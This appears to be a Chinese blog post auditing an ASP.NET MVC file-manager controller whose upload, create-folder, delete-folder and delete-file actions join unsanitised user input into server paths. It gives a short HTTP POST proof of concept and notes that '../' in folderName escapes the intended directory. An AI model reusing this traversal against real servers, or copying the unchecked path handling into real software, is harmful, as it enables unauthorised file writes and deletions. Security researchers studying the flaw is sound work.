.NET Core MVC 文件夹创建、删除方法
全局搜索
Create
Delete
EditFolderController.cs源码
using System.IO;
using System.Web;
using System.Web.Mvc;
namespace WebFolder.Controllers;
public class EditFolderController : Controller
{
public ActionResult UploadFile(HttpPostedFileBase fileUpload, string folderName, string path)
{
string root = "";
if (folderName == "root")
{
root = base.Server.MapPath("~/file");
}
else if (path != "/filemanager/")
{
if (string.IsNullOrEmpty(folderName))
{
string subpath = path.Split('/')[2];
root = base.Server.MapPath("~/file/" + subpath);
}
else
{
string subpath = path.Split('/')[2];
root = base.Server.MapPath("~/file/" + subpath + "/" + folderName);
}
}
else
{
root = base.Server.MapPath("~/file/" + folderName);
}
string fileName = Path.GetFileName(fileUpload.FileName);
if (fileName != null)
{
fileUpload.SaveAs(Path.Combine(root, fileName));
}
if (path != "/filemanager/")
{
return Redirect(path);
}
if (folderName == "root")
{
return Redirect("/filemanager/");
}
if (!string.IsNullOrEmpty(folderName))
{
return Redirect("/filemanager/" + folderName);
}
return Redirect("/filemanager/");
}
[HttpPost]
public ActionResult CreateFolder(string folderName, string path)
{
if (string.IsNullOrEmpty(folderName))
{
base.ViewData["Message"] = "Folder name is exists";
return Redirect(path);
}
string checkPath = "";
if (path != "/filemanager/")
{
string subpath = path.Split('/')[2];
checkPath = base.Server.MapPath("~/file/" + subpath + "/" + folderName);
}
else
{
checkPath = base.Server.MapPath("~/file/" + folderName);
}
if (Directory.Exists(checkPath))
{
base.ViewData["Message"] = "Folder name is exists";
}
else
{
Directory.CreateDirectory(checkPath);
}
if (path != "/filemanager/")
{
return Redirect(path);
}
return Redirect("/filemanager/");
}
[HttpPost]
public ActionResult DeleteFolder(string folderName, string path)
{
if (string.IsNullOrEmpty(folderName))
{
base.ViewData["Message"] = "Folder name is exists";
return Redirect(path);
}
string checkPath = "";
if (path != "/filemanager/")
{
string subpath = path.Split('/')[2];
checkPath = base.Server.MapPath("~/file/" + subpath + "/" + folderName);
}
else
{
checkPath = base.Server.MapPath("~/file/" + folderName);
}
if (!Directory.Exists(checkPath))
{
base.ViewData["Message"] = "Folder name not exists";
}
else
{
Directory.Delete(checkPath, recursive: true);
}
if (path != "/filemanager/")
{
return Redirect(path);
}
return Redirect("/filemanager/");
}
[HttpPost]
public ActionResult DeleteFile(string pathFile, string path)
{
try
{
string fullPath = base.Request.MapPath(pathFile);
if (System.IO.File.Exists(fullPath))
{
System.IO.File.Delete(fullPath);
}
if (path != "/filemanager/")
{
return Redirect(path);
}
return Redirect("/filemanager/");
}
catch (IOException)
{
if (path != "/filemanager/")
{
return Redirect(path);
}
return Redirect("/filemanager/");
}
}
}
代码分析
POST传入 folderName 和 path 参数去在 file 目录下创建文件夹,path 参数需要以 /filemanager/ 开头
目录创建代码
public ActionResult CreateFolder(string folderName, string path)
{
if (string.IsNullOrEmpty(folderName))
{
base.ViewData["Message"] = "Folder name is exists";
return Redirect(path);
}
string checkPath = "";
if (path != "/filemanager/")
{
string subpath = path.Split('/')[2];
checkPath = base.Server.MapPath("~/file/" + subpath + "/" + folderName);
}
else
{
checkPath = base.Server.MapPath("~/file/" + folderName);
}
if (Directory.Exists(checkPath))
{
base.ViewData["Message"] = "Folder name is exists";
}
else
{
Directory.CreateDirectory(checkPath);
}
if (path != "/filemanager/")
{
return Redirect(path);
}
return Redirect("/filemanager/");
}
关键代码
Directory.CreateDirectory 方法去创建拼接后的 checkPath 参数来实现目录创建
构造poc
POST /EditFolder/CreateFolder HTTP/1.1
Host: 127.0.0.1:9001
folderName=md&path=/filemanager/
在 folderName参数加../可以穿越到上一级目录创建文件夹
发送数据包成功创建 md 文件夹
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
